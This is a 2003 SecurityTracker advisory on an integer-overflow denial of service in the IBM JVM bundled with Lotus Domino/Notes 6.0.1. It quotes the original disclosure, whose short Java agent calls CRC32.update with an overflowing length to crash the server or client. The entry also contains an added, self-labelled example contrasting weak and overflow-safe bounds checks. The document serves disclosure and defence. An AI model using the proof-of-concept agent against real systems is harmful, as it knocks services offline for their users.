(Lotus Domino/Notes is Affected) Re: Sun Java JDK Bugs Allows Malicious Applets to Cause Denial of Service Conditions
|
|
SecurityTracker Alert ID: 1006494 |
|
SecurityTracker URL: http://securitytracker.com/id/1006494
|
|
CVE Reference:
GENERIC-MAP-NOMATCH
|
Date: Apr 7 2003
|
Impact:
Denial of service via local system, error
|
Exploit Included: Yes
|
Version(s): 6.0.1 (IBM JVM 1.3.1)
|
Description:
Several denial of service bugs were reported in the Sun Java development kit (1.4.1_01). The IBM Java Virtual Machine (JVM) 1.3.1 distributed with Lotus Domino/Notes is affected. A malicious applet could crash the Java environment.
In the original report, it was noted that buffer "underflow" protections in several classes can be disabled by an applet that provides a special combination of parameters. The vulnerabilities are reportedly due to inadequate range checks which allow integer overflows to occur.
In this new report, Lotus Domino/Notes is reported to be affected due to the vulnerability in the IBM JVM. An applet that calls the "update" method of the CRC32 class can trigger an integer overflow in the Java java.util.zip.* core libraries. This, in turn, reportedly invokes a JNI routine that cannot process the supplied input value. As a result, the Domino/Notes server or client will crash, according to the report.
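The range-check weakness described above, as an added example that is not part of the original advisory and is not JDK, IBM or Lotus source code: it compares a bounds check that adds offset and length in 32-bit arithmetic with two overflow-safe forms, using the parameter values from the report. The class name, the method names and the exact shape of the weak check are assumptions made for illustration.

```java
// Added illustration of an overflow-prone range check and its hardened forms.
// Hypothetical names throughout; nothing here calls java.util.zip or native code.
public class RangeCheckDemo {

    // Assumed shape of the weak check: off + len is evaluated as a signed
    // 32-bit int, so a large len can wrap the sum to a negative number
    // that compares as "within bounds".
    static boolean weakCheckAccepts(byte[] b, int off, int len) {
        return !(off < 0 || len < 0 || off + len > b.length);
    }

    // Overflow-safe form: once len >= 0 is established, b.length - len
    // cannot wrap, so the comparison is exact.
    static boolean safeCheckAccepts(byte[] b, int off, int len) {
        return !(off < 0 || len < 0 || off > b.length - len);
    }

    // Equivalent alternative: widen to 64 bits before adding.
    static boolean wideCheckAccepts(byte[] b, int off, int len) {
        return off >= 0 && len >= 0 && (long) off + (long) len <= b.length;
    }

    public static void main(String[] args) {
        byte[] empty = new byte[0];
        int[][] cases = {
            {0, 0},                  // valid empty range
            {4, 0x7ffffffc},         // offset and length given in the report
            {1, Integer.MAX_VALUE},  // constructed: another wrapping pair
            {0, 1},                  // constructed: plainly out of range
        };
        for (int[] c : cases) {
            int off = c[0], len = c[1];
            System.out.printf(
                "off=%d len=%d intSum=%d weak=%b safe=%b wide=%b%n",
                off, len, off + len,
                weakCheckAccepts(empty, off, len),
                safeCheckAccepts(empty, off, len),
                wideCheckAccepts(empty, off, len));
        }
    }
}
```

Only the weak check accepts the two wrapping pairs; all three agree on the valid and the plainly invalid case, which is why reviewing bounds checks for `off + len` style sums is a useful audit step for code that hands lengths to native routines.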
|
Impact:
A malicious applet can cause the Java environment to crash. In the case of the Domino server, a locally executed applet can trigger the flaw. In the case of the Notes client, a remotely supplied applet can trigger the flaw.
|
Solution:
A fixed version of the underlying Sun JRE is available (see the Message History).
At the time of this entry, it is not clear whether a fix exists for the IBM JDK/JVM.
|
Cause:
Exception handling error
|
Underlying OS:
Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000)
|
|
Message History:
This archive entry is a follow-up to the message listed below.
|
Source Message Contents
|
Date: Sun, 6 Apr 2003 23:11:27 +0200 (MES)
Subject: [VulnWatch] Java Agent freezes Lotus Notes and Domino 6.0.1 (fwd)
|
Hi,
the following agent causes the IBM JVM 1.3.1 shipped with Lotus Domino 6.0.1
and Lotus Notes 6.0.1 to crash. After calling the agent, a huge amount of memory
is not freed and causes the server machine (observed on MS XP) to
freeze and deny further service.
IMPLICATIONS
- If the agent is run on the client, Lotus Notes 6.0.1 is vulnerable,
- if the agent is run on the server, Lotus Domino 6.0.1 is vulnerable.
ANALYSIS:
The call to the "update" method of the CRC32 raises an integer overflow
in the Java java.util.zip.* core libraries which triggers a JNI routine
that cannot handle the extremely high input value.
HISTORY:
This vulnerability has already been detected in the Sun JDK
(http://developer.java.sun.com/developer/bugParade/bugs/4811913.html),
and was disclosed at Blackhat Windows 2003.
The background of these bugs is described at www.illegalaccess.org
Sincerely
Marc Schoenefeld
=========================Agent Source Code===========================
import lotus.domino.*;
import java.util.zip.*;

public class JavaAgent extends AgentBase {
    public void NotesMain() {
        try {
            Session session = getSession();
            AgentContext agentContext =
                session.getAgentContext();
            CRC32 crc32 = new CRC32();
            // offset 4 plus length 0x7ffffffc exceeds the largest
            // 32-bit signed int, so the sum overflows
            crc32.update(new byte[0], 4, 0x7ffffffc);
            // (Your code goes here)
        } catch(Exception e) {
            e.printStackTrace();
        }
    }
}
=========================Agent Source Code===========================
--
Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous
Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer
[ PGP Signature ok - Sun Apr 6 23:10:07 MES 2003 ]
|
|